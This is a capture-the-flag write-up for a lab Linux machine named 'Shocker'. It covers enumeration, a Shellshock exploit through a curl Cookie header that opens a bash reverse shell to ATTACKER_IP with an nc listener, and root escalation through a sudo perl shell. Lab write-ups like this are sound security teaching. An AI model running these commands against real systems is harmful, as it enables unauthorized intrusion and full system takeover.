In this writeup, we’re going to capture the flags of this easy linux machine named “Shocker”, we will see different steps to get them for user and root.
1. Nmap result :
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
After that, we will try to dirbusting the website using dirsearch command :
$ dirsearch -u http://10.129.181.123 [06:00:18] 403 - 297B - /cgi-bin/ [06:01:37] 403 - 302B - /server-status
And here we are with a cgi-bin/ sub-direcory, it’s interesting as we can exploit the shellshock attack if there’s a user.sh file inside.
to understand more about shellshock attak, please watch this very usuful explanation.
2. Exploiting ShellShock Attack and get user flag
first let’s start a listening shell
$ nc -lnvp 444
Secondly, we will get a reverse shell, and then capture our first flag.
$ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/ATTACKER_IP/444 0>&1' http://MACHINE_IP/cgi-bin/user.sh
Great now let’s move forward and get our root flag.
3. Privilege escalation and root flag
First thing to run before anything is :
$ sudo -l
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Piece of cake, we’re going to use GTFOBins Perl sudo exploitation comand
$ sudo perl -e 'exec "/bin/sh";'
Great, now we can get the root flag so easily.
i hope everything was clear for you, we managed in this writeup to exploit this machine with no trouble and i hope you did learn about the Shellshock attack.
if you have any question or suggestion to add to this article, please feel free to contact me here.